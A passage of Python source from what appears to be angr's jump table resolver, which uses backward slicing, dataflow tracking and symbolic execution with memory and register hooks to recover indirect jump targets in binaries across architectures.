@staticmethod
def _is_spoffset(expr) -> bool:
return 'SpOffset' in expr.variables
def _get_spoffset_expr(self, sp_offset: SpOffset) -> claripy.ast.BV:
v = self._SPOFFSET_BASE.annotate(RegOffsetAnnotation(sp_offset))
return v
@staticmethod
def _extract_spoffset_from_expr(expr: claripy.ast.Base) -> Optional[SpOffset]:
if expr.op == "BVS":
for anno in expr.annotations:
if isinstance(anno, RegOffsetAnnotation):
return anno.reg_offset
elif expr.op == "__add__":
if len(expr.args) == 1:
return JumpTableProcessor._extract_spoffset_from_expr(expr.args[0])
elif len(expr.args) == 2 and expr.args[1].op == "BVV":
sp_offset = JumpTableProcessor._extract_spoffset_from_expr(expr.args[0])
if sp_offset is not None:
delta = expr.args[1]._model_concrete.value
sp_offset += delta
return sp_offset
elif expr.op == "__and__":
if len(expr.args) == 2 and expr.args[1].op == "BVV":
# ignore all masking on SpOffsets
return JumpTableProcessor._extract_spoffset_from_expr(expr.args[0])
return None
@staticmethod
def _is_registeroffset(expr) -> bool:
return 'RegisterOffset' in expr.variables
def _get_regoffset_expr(self, reg_offset: RegisterOffset, bits: int) -> claripy.ast.BV:
if bits not in self._REGOFFSET_BASE:
self._REGOFFSET_BASE[bits] = claripy.BVS('RegisterOffset', bits, explicit_name=True)
v = self._REGOFFSET_BASE[bits].annotate(RegOffsetAnnotation(reg_offset))
return v
@staticmethod
def _extract_regoffset_from_expr(expr: claripy.ast.Base) -> Optional[RegisterOffset]:
if expr.op == "BVS":
for anno in expr.annotations:
if isinstance(anno, RegOffsetAnnotation):
return anno.reg_offset
elif expr.op == "__add__":
if len(expr.args) == 1:
return JumpTableProcessor._extract_regoffset_from_expr(expr.args[0])
elif len(expr.args) == 2 and expr.args[1].op == "BVV":
reg_offset = JumpTableProcessor._extract_regoffset_from_expr(expr.args[0])
if reg_offset is not None:
delta = expr.args[1]._model_concrete.value
reg_offset += delta
return reg_offset
elif expr.op == "__and__":
if len(expr.args) == 2 and expr.args[1].op == "BVV":
# ignore all masking on SpOffsets
return JumpTableProcessor._extract_spoffset_from_expr(expr.args[0])
return None
def _handle_WrTmp(self, stmt):
self._tsrc = set()
super()._handle_WrTmp(stmt)
if self._tsrc:
self.state._tmpvar_source[stmt.tmp] = self._tsrc
def _handle_Put(self, stmt):
self._tsrc = set()
offset = stmt.offset
data = self._expr(stmt.data)
if self._tsrc is not None:
r = [self._tsrc, data]
else:
r = [(self.block.addr, self.stmt_idx), data]
self.state._registers[offset] = r
def _handle_Store(self, stmt):
self._tsrc = set()
addr = self._expr(stmt.addr)
data = self._expr(stmt.data)
if addr is None:
return
if isinstance(addr, SpOffset):
self.state._stack[addr.offset] = ((self.block.addr, self.stmt_idx), data)
def _handle_RdTmp(self, expr):
v = super()._handle_RdTmp(expr)
if expr.tmp in self.state._tmpvar_source:
self._tsrc |= set(self.state._tmpvar_source[expr.tmp])
return v
def _handle_Get(self, expr):
if expr.offset == self.arch.bp_offset:
v = self._get_spoffset_expr(SpOffset(self.arch.bits, self._bp_sp_diff))
elif expr.offset == self.arch.sp_offset:
v = self._get_spoffset_expr(SpOffset(self.arch.bits, 0))
else:
if expr.offset in self.state._registers:
self._tsrc |= set(self.state._registers[expr.offset][0])
v = self.state._registers[expr.offset][1]
else:
# the register does not exist
# we initialize it here
v = RegisterOffset(expr.result_size(self.tyenv), expr.offset, 0)
v = self._get_regoffset_expr(v, expr.result_size(self.tyenv))
src = (self.block.addr, self.stmt_idx)
self._tsrc.add(src)
self.state._registers[expr.offset] = ([src], v)
# make sure the size matches
# note that this is sometimes incorrect. for example, we do not differentiate between reads at ah and al...
# but it should be good enough for now (without switching state._registers to a real SimMemory, which will
# surely slow down stuff quite a bit)
if v is not None:
bits = expr.result_size(self.tyenv)
if v.size() > bits:
v = v[bits - 1:0]
elif v.size() < bits:
v = claripy.ZeroExt(bits - v.size(), v)
return v
def _handle_function(self, expr): # pylint:disable=unused-argument,no-self-use
return None # This analysis is not interprocedural
def _handle_Load(self, expr):
addr = self._expr(expr.addr)
size = expr.result_size(self.tyenv) // 8
return self._do_load(addr, size)
def _handle_LoadG(self, stmt):
guard = self._expr(stmt.guard)
if guard is True:
return self._do_load(stmt.addr, stmt.addr.result_size(self.tyenv) // 8)
elif guard is False:
return self._do_load(stmt.alt, stmt.alt.result_size(self.tyenv) // 8)
else:
return None
def _handle_Const(self, expr):
v = super()._handle_Const(expr)
self._tsrc.add('const')
return v
def _handle_CmpLE(self, expr):
self._handle_Comparison(*expr.args)
def _handle_CmpGE(self, expr):
self._handle_Comparison(*expr.args)
def _handle_CmpLT(self, expr):
self._handle_Comparison(*expr.args)
def _handle_CmpGT(self, expr):
self._handle_CmpGE(*expr.args)
def _handle_CCall(self, expr):
if not isinstance(expr.args[0], pyvex.IRExpr.Const):
return
cond_type_enum = expr.args[0].con.value
if self.arch.name in { 'X86', 'AMD64', 'AARCH64' }:
if cond_type_enum in EXPECTED_COND_TYPES[self.arch.name]:
self._handle_Comparison(expr.args[2], expr.args[3])
elif is_arm_arch(self.arch):
if cond_type_enum in EXPECTED_COND_TYPES['ARM']:
self._handle_Comparison(expr.args[2], expr.args[3])
else:
raise ValueError("Unexpected ccall encountered in architecture %s." % self.arch.name)
def _handle_Comparison(self, arg0, arg1):
# found the comparison
arg0_src, arg1_src = None, None
if isinstance(arg0, pyvex.IRExpr.RdTmp):
if arg0.tmp in self.state._tmpvar_source:
arg0_src = self.state._tmpvar_source[arg0.tmp]
if not arg0_src or len(arg0_src) > 1:
arg0_src = None
else:
arg0_src = next(iter(arg0_src))
elif isinstance(arg0, pyvex.IRExpr.Const):
arg0_src = 'const'
if isinstance(arg1, pyvex.IRExpr.RdTmp):
if arg1.tmp in self.state._tmpvar_source:
arg1_src = self.state._tmpvar_source[arg1.tmp]
if not arg1_src or len(arg1_src) > 1:
arg1_src = None
else:
arg1_src = next(iter(arg1_src))
elif isinstance(arg1, pyvex.IRExpr.Const):
arg1_src = 'const'
if arg0_src == 'const' and arg1_src == 'const':
# comparison of two consts... there is nothing we can do
self.state.is_jumptable = True
return
if arg0_src not in ('const', None) and arg1_src not in ('const', None):
# this is probably not a jump table
return
if arg1_src == 'const':
# make sure arg0_src is const
arg0_src, arg1_src = arg1_src, arg0_src
self.state.is_jumptable = True
if arg0_src != 'const':
# we failed during dependency tracking so arg0_src couldn't be determined
# but we will still try to resolve it as a jump table as a fall back
return
if isinstance(arg1_src, tuple):
arg1_src_stmt = self.project.factory.block(arg1_src[0], cross_insn_opt=True).vex.statements[arg1_src[1]]
if isinstance(arg1_src_stmt, pyvex.IRStmt.Store):
# Storing a constant/variable in memory
# We will need to overwrite it when executing the slice to guarantee the full recovery of jump table
# targets.
#
# Here is an example:
# mov [rbp+var_54], 1
# loc_4051a6:
# cmp [rbp+var_54], 6
# ja loc_405412 (default)
#
# Instead of writing 1 to [rbp+var_54], we want to write a symbolic variable there instead. Otherwise
# we will only recover the second jump target instead of all 7 targets.
self.state.stmts_to_instrument.append(('mem_write', ) + arg1_src)
elif isinstance(arg1_src_stmt, pyvex.IRStmt.WrTmp) \
and isinstance(arg1_src_stmt.data, pyvex.IRExpr.Load):
# Loading a constant/variable from memory (and later the value is stored in a register)
# Same as above, we will need to overwrite it when executing the slice to guarantee the full recovery
# of jump table targets.
#
# Here is an example:
# mov eax, [0x625a3c]
# cmp eax, 0x4
# ja 0x40899d (default)
# loc_408899:
# mov eax, eax
# mov rax, qword [rax*8+0x220741]
# jmp rax
#
self.state.stmts_to_instrument.append(('mem_read', ) + arg1_src)
elif isinstance(arg1_src_stmt, pyvex.IRStmt.Put):
# Storing a constant/variable in register
# Same as above...
#
# Here is an example:
# movzx eax, byte ptr [rax+12h]
# movzx eax, al
# cmp eax, 0xe
# ja 0x405b9f (default)
# loc_405b34:
# mov eax, eax
# mov rax, qword [rax*8+0x2231ae]
#
self.state.stmts_to_instrument.append(('reg_write', ) + arg1_src)
def _do_load(self, addr, size):
src = (self.block.addr, self.stmt_idx)
self._tsrc = { src }
if addr is None:
return None
if self._is_spoffset(addr):
spoffset = self._extract_spoffset_from_expr(addr)
if spoffset is not None and spoffset.offset in self.state._stack:
self._tsrc = { self.state._stack[spoffset.offset][0] }
return self.state._stack[spoffset.offset][1]
elif isinstance(addr, int):
# Load data from memory if it is mapped
try:
v = self.project.loader.memory.unpack_word(addr, size=size)
return v
except KeyError:
return None
elif self._is_registeroffset(addr):
# Load data from a register, but this register hasn't been initialized at this point
# We will need to initialize this register during slice execution later
# Try to get where this register is first accessed
reg_offset = self._extract_regoffset_from_expr(addr)
if reg_offset is not None and reg_offset.reg in self.state._registers:
try:
source = next(iter(src for src in self.state._registers[reg_offset.reg][0] if src != 'const'))
assert isinstance(source, tuple)
self.state.regs_to_initialize.append(source + (reg_offset.reg, reg_offset.bits))
except StopIteration:
# we don't need to initialize this register
# it might be caused by an incorrect analysis result
# e.g. PN-337140.bin 11e918 r0 comes from r4, r4 comes from r0@11e8c0, and r0@11e8c0 comes from
# function call sub_375c04. Since we do not analyze sub_375c04, we treat r0@11e918 as a constant 0.
pass
return None
return None
#
# State hooks
#
class StoreHook:
@staticmethod
def hook(state):
write_length = state.inspect.mem_write_length
if write_length is None:
write_length = len(state.inspect.mem_write_expr)
else:
write_length = write_length * state.arch.byte_width
state.inspect.mem_write_expr = state.solver.BVS('instrumented_store', write_length)
class LoadHook:
def __init__(self):
self._var = None
def hook_before(self, state):
addr = state.inspect.mem_read_address
size = state.solver.eval(state.inspect.mem_read_length)
self._var = state.solver.BVS('instrumented_load', size * 8)
state.memory.store(addr, self._var, endness=state.arch.memory_endness)
def hook_after(self, state):
state.inspect.mem_read_expr = self._var
class PutHook:
@staticmethod
def hook(state):
state.inspect.reg_write_expr = state.solver.BVS('instrumented_put',
state.solver.eval(state.inspect.reg_write_length) * 8)
class RegisterInitializerHook:
def __init__(self, reg_offset, reg_bits, value):
self.reg_offset = reg_offset
self.reg_bits = reg_bits
self.value = value
def hook(self, state):
state.registers.store(self.reg_offset, state.solver.BVV(self.value, self.reg_bits))
class BSSHook:
def __init__(self, project, bss_regions):
self.project = project
self._bss_regions = bss_regions
self._written_addrs = set()
def bss_memory_read_hook(self, state):
if not self._bss_regions:
return
read_addr = state.inspect.mem_read_address
read_length = state.inspect.mem_read_length
if not isinstance(read_addr, int) and read_addr.symbolic:
# don't touch it
return
concrete_read_addr = state.solver.eval(read_addr)
concrete_read_length = state.solver.eval(read_length)
for start, size in self._bss_regions:
if start <= concrete_read_addr < start + size:
# this is a read from the .bss section
break
else:
return
if concrete_read_addr not in self._written_addrs:
# it was never written to before. we overwrite it with unconstrained bytes
for i in range(0, concrete_read_length, self.project.arch.bytes):
state.memory.store(concrete_read_addr + i, state.solver.Unconstrained('unconstrained',
self.project.arch.bits),
endness=self.project.arch.memory_endness)
# job done :-)
def bss_memory_write_hook(self, state):
if not self._bss_regions:
return
write_addr = state.inspect.mem_write_address
if not isinstance(write_addr, int) and write_addr.symbolic:
return
concrete_write_addr = state.solver.eval(write_addr)
concrete_write_length = state.solver.eval(state.inspect.mem_write_length) \
if state.inspect.mem_write_length is not None \
else len(state.inspect.mem_write_expr) // state.arch.byte_width
for start, size in self._bss_regions:
if start <= concrete_write_addr < start + size:
# hit a BSS section
break
else:
return
if concrete_write_length > 1024:
l.warning("Writing more 1024 bytes to the BSS region, only considering the first 1024 bytes.")
concrete_write_length = 1024
for i in range(concrete_write_addr, concrete_write_length):
self._written_addrs.add(i)
#
# Main class
#
class JumpTableResolver(IndirectJumpResolver):
"""
A generic jump table resolver.
This is a fast jump table resolution. For performance concerns, we made the following assumptions:
- The final jump target comes from the memory.
- The final jump target must be directly read out of the memory, without any further modification or altering.
"""
def __init__(self, project):
super(JumpTableResolver, self).__init__(project, timeless=False)
self._bss_regions = None
# the maximum number of resolved targets. Will be initialized from CFG.
self._max_targets = None
# cached memory read addresses that are used to initialize uninitialized registers
# should be cleared before every symbolic execution run on the slice
self._cached_memread_addrs = { }
self._find_bss_region()
def filter(self, cfg, addr, func_addr, block, jumpkind):
if pcode is not None and isinstance(block.vex, pcode.lifter.IRSB):
if once('pcode__indirect_jump_resolver'):
l.warning('JumpTableResolver does not support P-Code IR yet; CFG may be incomplete.')
return False
if is_arm_arch(self.project.arch):
# For ARM, we support both jump tables and "call tables" (because of how crazy ARM compilers are...)
if jumpkind in ('Ijk_Boring', 'Ijk_Call'):
return True
else:
# For all other architectures, we only expect jump tables
if jumpkind == 'Ijk_Boring':
return True
return False
def resolve(self, cfg, addr, func_addr, block, jumpkind):
"""
Resolves jump tables.
:param cfg: A CFG instance.
:param int addr: IRSB address.
:param int func_addr: The function address.
:param pyvex.IRSB block: The IRSB.
:return: A bool indicating whether the indirect jump is resolved successfully, and a list of resolved targets
:rtype: tuple
"""
self._max_targets = cfg._indirect_jump_target_limit
for slice_steps in range(1, 4):
# Perform a backward slicing from the jump target
# Important: Do not go across function call boundaries
b = Blade(cfg.graph, addr, -1,
cfg=cfg, project=self.project,
ignore_sp=False, ignore_bp=False,
max_level=slice_steps, base_state=self.base_state, stop_at_calls=True, cross_insn_opt=True)
l.debug("Try resolving %#x with a %d-level backward slice...", addr, slice_steps)
r, targets = self._resolve(cfg, addr, func_addr, b)
if r:
return r, targets
return False, None
#
# Private methods
#
def _resolve(self, cfg, addr, func_addr, b):
"""
Internal method for resolving jump tables.
:param cfg: A CFG instance.
:param int addr: Address of the block where the indirect jump is.
:param int func_addr: Address of the function.
:param Blade b: The generated backward slice.
:return: A bool indicating whether the indirect jump is resolved successfully, and a list of
resolved targets.
:rtype: tuple
"""
project = self.project # short-hand
stmt_loc = (addr, DEFAULT_STATEMENT)
if stmt_loc not in b.slice:
return False, None
load_stmt_loc, load_stmt, load_size, stmts_to_remove, stmts_adding_base_addr, all_addr_holders = \
self._find_load_statement(b, stmt_loc)
ite_stmt, ite_stmt_loc = None, None
if load_stmt_loc is None:
# the load statement is not found
# maybe it's a typical ARM-style jump table like the following:
# SUB R3, R5, #34
# CMP R3, #28
# ADDLS PC, PC, R3,LSL#2
if is_arm_arch(self.project.arch):
ite_stmt, ite_stmt_loc, stmts_to_remove = self._find_load_pc_ite_statement(b, stmt_loc)
if ite_stmt is None:
return False, None
try:
jump_target = self._try_resolve_single_constant_loads(load_stmt, cfg, addr)
except NotAJumpTableNotification:
return False, None
if jump_target is not None:
if self._is_target_valid(cfg, jump_target):
ij = cfg.indirect_jumps[addr]
ij.jumptable = False
ij.resolved_targets = { jump_target }
return True, [ jump_target ]
else:
return False, None
# Well, we have a real jump table to resolve!
# skip all statements after the load statement
# We want to leave the final loaded value as symbolic, so we can
# get the full range of possibilities
b.slice.remove_nodes_from(stmts_to_remove)
try:
stmts_to_instrument, regs_to_initialize = self._jumptable_precheck(b)
except NotAJumpTableNotification:
l.debug("Indirect jump at %#x does not look like a jump table. Skip.", addr)
return False, None
# Debugging output
if l.level == logging.DEBUG:
self._dbg_repr_slice(b)
# Get all sources
sources = [ n_ for n_ in b.slice.nodes() if b.slice.in_degree(n_) == 0 ]
# Create the annotated CFG
annotatedcfg = AnnotatedCFG(project, None, detect_loops=False)
annotatedcfg.from_digraph(b.slice)
# pylint: disable=too-many-nested-blocks
for src_irsb, _ in sources:
# Use slicecutor to execute each one, and get the address
# We simply give up if any exception occurs on the way
start_state = self._initial_state(src_irsb)
# Keep IP symbolic to avoid unnecessary concretization
start_state.options.add(o.KEEP_IP_SYMBOLIC)
start_state.options.add(o.NO_IP_CONCRETIZATION)
# be quiet!!!!!!
start_state.options.add(o.SYMBOL_FILL_UNCONSTRAINED_REGISTERS)
start_state.options.add(o.SYMBOL_FILL_UNCONSTRAINED_MEMORY)
# any read from an uninitialized segment should be unconstrained
if self._bss_regions:
bss_hook = BSSHook(self.project, self._bss_regions)
bss_memory_write_bp = BP(when=BP_AFTER, enabled=True, action=bss_hook.bss_memory_write_hook)
start_state.inspect.add_breakpoint('mem_write', bss_memory_write_bp)
bss_memory_read_bp = BP(when=BP_BEFORE, enabled=True, action=bss_hook.bss_memory_read_hook)
start_state.inspect.add_breakpoint('mem_read', bss_memory_read_bp)
# instrument specified store/put/load statements
self._instrument_statements(start_state, stmts_to_instrument, regs_to_initialize)
# FIXME:
# this is a hack: for certain architectures, we do not initialize the base pointer, since the jump table on
# those architectures may use the bp register to store value
if not self.project.arch.name in {'S390X'}:
start_state.regs.bp = start_state.arch.initial_sp + 0x2000
self._cached_memread_addrs.clear()
init_registers_on_demand_bp = BP(when=BP_BEFORE, enabled=True, action=self._init_registers_on_demand)
start_state.inspect.add_breakpoint('mem_read', init_registers_on_demand_bp)
# use Any as the concretization strategy
start_state.memory.read_strategies = [SimConcretizationStrategyAny()]
start_state.memory.write_strategies = [SimConcretizationStrategyAny()]
# Create the slicecutor
simgr = self.project.factory.simulation_manager(start_state, resilience=True)
slicecutor = Slicecutor(annotatedcfg, force_taking_exit=True)
simgr.use_technique(slicecutor)
if load_stmt is not None:
explorer = Explorer(find=load_stmt_loc[0])
elif ite_stmt is not None:
explorer = Explorer(find=ite_stmt_loc[0])
else:
raise TypeError("Unsupported type of jump table.")
simgr.use_technique(explorer)
# Run it!
try:
simgr.run()
except KeyError as ex:
# This is because the program slice is incomplete.
# Blade will support more IRExprs and IRStmts in the future
l.debug("KeyError occurred due to incomplete program slice.", exc_info=ex)
continue
# Get the jumping targets
for r in simgr.found:
if load_stmt is not None:
ret = self._try_resolve_targets_load(r, addr, cfg, annotatedcfg, load_stmt, load_size,
stmts_adding_base_addr, all_addr_holders)
if ret is None:
# Try the next state
continue
jump_table, jumptable_addr, entry_size, jumptable_size, all_targets, sort = ret
if sort == "jumptable":
ij_type = IndirectJumpType.Jumptable_AddressLoadedFromMemory
elif sort == "vtable":
ij_type = IndirectJumpType.Vtable
else:
ij_type = IndirectJumpType.Unknown
elif ite_stmt is not None:
ret = self._try_resolve_targets_ite(r, addr, cfg, annotatedcfg, ite_stmt)
if ret is None:
# Try the next state
continue
jumptable_addr = None
jump_table, jumptable_size, entry_size = ret
all_targets = jump_table
ij_type = IndirectJumpType.Jumptable_AddressComputed
else:
raise TypeError("Unsupported type of jump table.")
assert ret is not None
l.info("Resolved %d targets from %#x.", len(all_targets), addr)
# write to the IndirectJump object in CFG
ij: IndirectJump = cfg.indirect_jumps[addr]
if len(all_targets) > 1:
# It can be considered a jump table only if there are more than one jump target
if ij_type in (IndirectJumpType.Jumptable_AddressComputed, IndirectJumpType.Jumptable_AddressLoadedFromMemory):
ij.jumptable = True
else:
ij.jumptable = False
ij.jumptable_addr = jumptable_addr
ij.jumptable_size = jumptable_size
ij.jumptable_entry_size = entry_size
ij.resolved_targets = set(jump_table)
ij.jumptable_entries = jump_table
ij.type = ij_type
else:
ij.jumptable = False
ij.resolved_targets = set(jump_table)
return True, all_targets
l.info("Could not resolve indirect jump %#x in function %#x.", addr, func_addr)
return False, None
def _find_load_statement(self, b, stmt_loc):
"""
Find the location of the final Load statement that loads indirect jump targets from the jump table.
"""
# pylint:disable=no-else-continue
# shorthand
project = self.project
# initialization
load_stmt_loc, load_stmt, load_size = None, None, None
stmts_to_remove = [stmt_loc]
stmts_adding_base_addr = [] # type: list[JumpTargetBaseAddr]
# All temporary variables that hold indirect addresses loaded out of the memory
# Obviously, load_stmt.tmp must be here
# if there are additional data transferring statements between the Load statement and the base-address-adding
# statement, all_addr_holders will have more than one temporary variables
#
# Here is an example:
#
# IRSB 0x4c64c4
# + 06 | t12 = LDle:I32(t7)
# + 07 | t11 = 32Sto64(t12)
# + 10 | t2 = Add64(0x0000000000571df0,t11)
#
# all_addr_holders will be {(0x4c64c4, 11): (AddressTransferringTypes.SignedExtension, 32, 64,),
# (0x4c64c4, 12); (AddressTransferringTypes.Assignment,),
# }
all_addr_holders = OrderedDict()
while True:
preds = list(b.slice.predecessors(stmt_loc))
if len(preds) != 1:
break
block_addr, stmt_idx = stmt_loc = preds[0]
block = project.factory.block(block_addr, cross_insn_opt=True, backup_state=self.base_state).vex
if stmt_idx == DEFAULT_STATEMENT:
# it's the default exit. continue
continue
stmt = block.statements[stmt_idx]
if isinstance(stmt, (pyvex.IRStmt.WrTmp, pyvex.IRStmt.Put)):
if isinstance(stmt.data, (pyvex.IRExpr.Get, pyvex.IRExpr.RdTmp)):
# data transferring
stmts_to_remove.append(stmt_loc)
if isinstance(stmt, pyvex.IRStmt.WrTmp):
all_addr_holders[(stmt_loc[0], stmt.tmp)] = (AddressTransferringTypes.Assignment,)
continue
elif isinstance(stmt.data, pyvex.IRExpr.ITE):
# data transferring
# t16 = if (t43) ILGop_Ident32(LDle(t29)) else 0x0000c844
# > t44 = ITE(t43,t16,0x0000c844)
stmts_to_remove.append(stmt_loc)
if isinstance(stmt, pyvex.IRStmt.WrTmp):
all_addr_holders[(stmt_loc[0], stmt.tmp)] = (AddressTransferringTypes.Assignment,)
continue
elif isinstance(stmt.data, pyvex.IRExpr.Unop):
if stmt.data.op == 'Iop_32Sto64':
# data transferring with conversion
# t11 = 32Sto64(t12)
stmts_to_remove.append(stmt_loc)
if isinstance(stmt, pyvex.IRStmt.WrTmp):
all_addr_holders[(stmt_loc[0], stmt.tmp)] = (AddressTransferringTypes.SignedExtension,
32, 64)
continue
elif stmt.data.op == 'Iop_64to32':
# data transferring with conversion
# t24 = 64to32(t21)
stmts_to_remove.append(stmt_loc)
if isinstance(stmt, pyvex.IRStmt.WrTmp):
all_addr_holders[(stmt_loc[0], stmt.tmp)] = (AddressTransferringTypes.Truncation,
64, 32)
continue
elif stmt.data.op == 'Iop_32Uto64':
# data transferring with conversion
# t21 = 32Uto64(t22)
stmts_to_remove.append(stmt_loc)
if isinstance(stmt, pyvex.IRStmt.WrTmp):
all_addr_holders[(stmt_loc[0], stmt.tmp)] = (AddressTransferringTypes.UnsignedExtension,
32, 64)
continue
elif stmt.data.op == 'Iop_16Uto32':
# data transferring wth conversion
stmts_to_remove.append(stmt_loc)
if isinstance(stmt, pyvex.IRStmt.WrTmp):
all_addr_holders[(stmt_loc[0], stmt.tmp)] = (AddressTransferringTypes.UnsignedExtension,
16, 32)
continue
elif stmt.data.op == 'Iop_8Uto32':
# data transferring wth conversion
stmts_to_remove.append(stmt_loc)
if isinstance(stmt, pyvex.IRStmt.WrTmp):
all_addr_holders[(stmt_loc[0], stmt.tmp)] = (AddressTransferringTypes.UnsignedExtension,
8, 32)
continue
elif isinstance(stmt.data, pyvex.IRExpr.Binop):
if stmt.data.op.startswith('Iop_Add'):
# GitHub issue #1289, an S390X binary
# jump_label = &jump_table + *(jump_table[index])
# IRSB 0x4007c0
# 00 | ------ IMark(0x4007c0, 4, 0) ------
# + 01 | t0 = GET:I32(212)
# + 02 | t1 = Add32(t0,0xffffffff)
# 03 | PUT(352) = 0x0000000000000003
# 04 | t13 = 32Sto64(t0)
# 05 | t6 = t13
# 06 | PUT(360) = t6
# 07 | PUT(368) = 0xffffffffffffffff
# 08 | PUT(376) = 0x0000000000000000
# 09 | PUT(212) = t1
# 10 | PUT(ia) = 0x00000000004007c4
# 11 | ------ IMark(0x4007c4, 6, 0) ------
# + 12 | t14 = 32Uto64(t1)
# + 13 | t8 = t14
# + 14 | t16 = CmpLE64U(t8,0x000000000000000b)
# + 15 | t15 = 1Uto32(t16)
# + 16 | t10 = t15
# + 17 | t11 = CmpNE32(t10,0x00000000)
# + 18 | if (t11) { PUT(offset=336) = 0x4007d4; Ijk_Boring }
# Next: 0x4007ca
#
# IRSB 0x4007d4
# 00 | ------ IMark(0x4007d4, 6, 0) ------
# + 01 | t8 = GET:I64(r2)
# + 02 | t7 = Shr64(t8,0x3d)
# + 03 | t9 = Shl64(t8,0x03)
# + 04 | t6 = Or64(t9,t7)
# + 05 | t11 = And64(t6,0x00000007fffffff8)
# 06 | ------ IMark(0x4007da, 6, 0) ------
# 07 | PUT(r1) = 0x0000000000400a50
# 08 | PUT(ia) = 0x00000000004007e0
# 09 | ------ IMark(0x4007e0, 6, 0) ------
# + 10 | t12 = Add64(0x0000000000400a50,t11)
# + 11 | t16 = LDbe:I64(t12)
# 12 | PUT(r2) = t16
# 13 | ------ IMark(0x4007e6, 4, 0) ------
# + 14 | t17 = Add64(0x0000000000400a50,t16)
# + Next: t17
#
# Special case: a base address is added to the loaded offset before jumping to it.
if isinstance(stmt.data.args[0], pyvex.IRExpr.Const) and \
isinstance(stmt.data.args[1], pyvex.IRExpr.RdTmp):
stmts_adding_base_addr.append(JumpTargetBaseAddr(stmt_loc, stmt,
stmt.data.args[1].tmp,
base_addr=stmt.data.args[0].con.value)
)
stmts_to_remove.append(stmt_loc)
elif isinstance(stmt.data.args[0], pyvex.IRExpr.RdTmp) and \
isinstance(stmt.data.args[1], pyvex.IRExpr.Const):
stmts_adding_base_addr.append(JumpTargetBaseAddr(stmt_loc, stmt,
stmt.data.args[0].tmp,
base_addr=stmt.data.args[1].con.value)
)
stmts_to_remove.append(stmt_loc)
elif isinstance(stmt.data.args[0], pyvex.IRExpr.RdTmp) and \
isinstance(stmt.data.args[1], pyvex.IRExpr.RdTmp):
# one of the tmps must be holding a concrete value at this point
stmts_adding_base_addr.append(JumpTargetBaseAddr(stmt_loc, stmt,
stmt.data.args[0].tmp,
tmp_1=stmt.data.args[1].tmp)
)
stmts_to_remove.append(stmt_loc)
else:
# not supported
pass
continue
elif stmt.data.op.startswith('Iop_Or'):
# this is sometimes used in VEX statements in THUMB mode code to adjust the address to an odd
# number
# e.g.
# IRSB 0x4b63
# 00 | ------ IMark(0x4b62, 4, 1) ------
# 01 | PUT(itstate) = 0x00000000
# + 02 | t11 = GET:I32(r2)
# + 03 | t10 = Shl32(t11,0x01)
# + 04 | t9 = Add32(0x00004b66,t10)
# + 05 | t8 = LDle:I16(t9)
# + 06 | t7 = 16Uto32(t8)
# + 07 | t14 = Shl32(t7,0x01)
# + 08 | t13 = Add32(0x00004b66,t14)
# + 09 | t12 = Or32(t13,0x00000001)
# + Next: t12
if isinstance(stmt.data.args[0], pyvex.IRExpr.RdTmp) and \
isinstance(stmt.data.args[1], pyvex.IRExpr.Const) and stmt.data.args[1].con.value == 1:
# great. here it is
stmts_to_remove.append(stmt_loc)
all_addr_holders[(stmt_loc[0], stmt.tmp)] = (AddressTransferringTypes.Or1, )
continue
elif stmt.data.op.startswith('Iop_Shl'):
# this is sometimes used when dealing with TBx instructions in ARM code.
# e.g.
# IRSB 0x4b63
# 00 | ------ IMark(0x4b62, 4, 1) ------
# 01 | PUT(itstate) = 0x00000000
# + 02 | t11 = GET:I32(r2)
# + 03 | t10 = Shl32(t11,0x01)
# + 04 | t9 = Add32(0x00004b66,t10)
# + 05 | t8 = LDle:I16(t9)
# + 06 | t7 = 16Uto32(t8)
# + 07 | t14 = Shl32(t7,0x01)
# + 08 | t13 = Add32(0x00004b66,t14)
# + 09 | t12 = Or32(t13,0x00000001)
# + Next: t12
if isinstance(stmt.data.args[0], pyvex.IRExpr.RdTmp) and \
isinstance(stmt.data.args[1], pyvex.IRExpr.Const):
# found it
stmts_to_remove.append(stmt_loc)
all_addr_holders[(stmt_loc[0], stmt.tmp)] = (AddressTransferringTypes.ShiftLeft,
stmt.data.args[1].con.value)
continue
elif isinstance(stmt.data, pyvex.IRExpr.Load):
# Got it!
load_stmt, load_stmt_loc, load_size = stmt, stmt_loc, \
block.tyenv.sizeof(stmt.tmp) // self.project.arch.byte_width
stmts_to_remove.append(stmt_loc)
all_addr_holders[(stmt_loc[0], stmt.tmp)] = (AddressTransferringTypes.Assignment, )
elif isinstance(stmt, pyvex.IRStmt.LoadG):
# Got it!
#
# this is how an ARM jump table is translated to VEX
# > t16 = if (t43) ILGop_Ident32(LDle(t29)) else 0x0000c844
load_stmt, load_stmt_loc, load_size = stmt, stmt_loc, \
block.tyenv.sizeof(stmt.dst) // self.project.arch.byte_width
stmts_to_remove.append(stmt_loc)
break
return load_stmt_loc, load_stmt, load_size, stmts_to_remove, stmts_adding_base_addr, all_addr_holders
def _find_load_pc_ite_statement(self, b: Blade, stmt_loc: Tuple[int,int]):
"""
Find the location of the final ITE statement that loads indirect jump targets into a tmp.
The slice looks like the following:
IRSB 0x41d0fc
00 | ------ IMark(0x41d0fc, 4, 0) ------
+ 01 | t0 = GET:I32(r5)
+ 02 | t2 = Sub32(t0,0x00000022)
03 | PUT(r3) = t2
04 | ------ IMark(0x41d100, 4, 0) ------
05 | PUT(cc_op) = 0x00000002
06 | PUT(cc_dep1) = t2
07 | PUT(cc_dep2) = 0x0000001c
08 | PUT(cc_ndep) = 0x00000000
09 | ------ IMark(0x41d104, 4, 0) ------
+ 10 | t25 = CmpLE32U(t2,0x0000001c)
11 | t24 = 1Uto32(t25)
+ 12 | t8 = Shl32(t2,0x02)
+ 13 | t10 = Add32(0x0041d10c,t8)
+ 14 | t26 = ITE(t25,t10,0x0041d104) <---- this is the statement that we are looking for. Note that
0x0041d104 *must* be ignored since it is a side effect generated
by the VEX ARM lifter
15 | PUT(pc) = t26
16 | t21 = Xor32(t24,0x00000001)
17 | t27 = 32to1(t21)
18 | if (t27) { PUT(offset=68) = 0x41d108; Ijk_Boring }
+ Next: t26
:param b: The Blade instance, which comes with the slice.
:param stmt_loc: The location of the final statement.
:return:
"""
project = self.project
ite_stmt, ite_stmt_loc = None, None
stmts_to_remove = [stmt_loc]
while True:
preds = list(b.slice.predecessors(stmt_loc))
if len(preds) != 1:
break
block_addr, stmt_idx = stmt_loc = preds[0]
stmts_to_remove.append(stmt_loc)
block = project.factory.block(block_addr, cross_insn_opt=True).vex
if stmt_idx == DEFAULT_STATEMENT:
# we should not reach the default exit (which belongs to a predecessor block)
break
if not isinstance(block.next, pyvex.IRExpr.RdTmp):
# next must be an RdTmp
break
stmt = block.statements[stmt_idx]
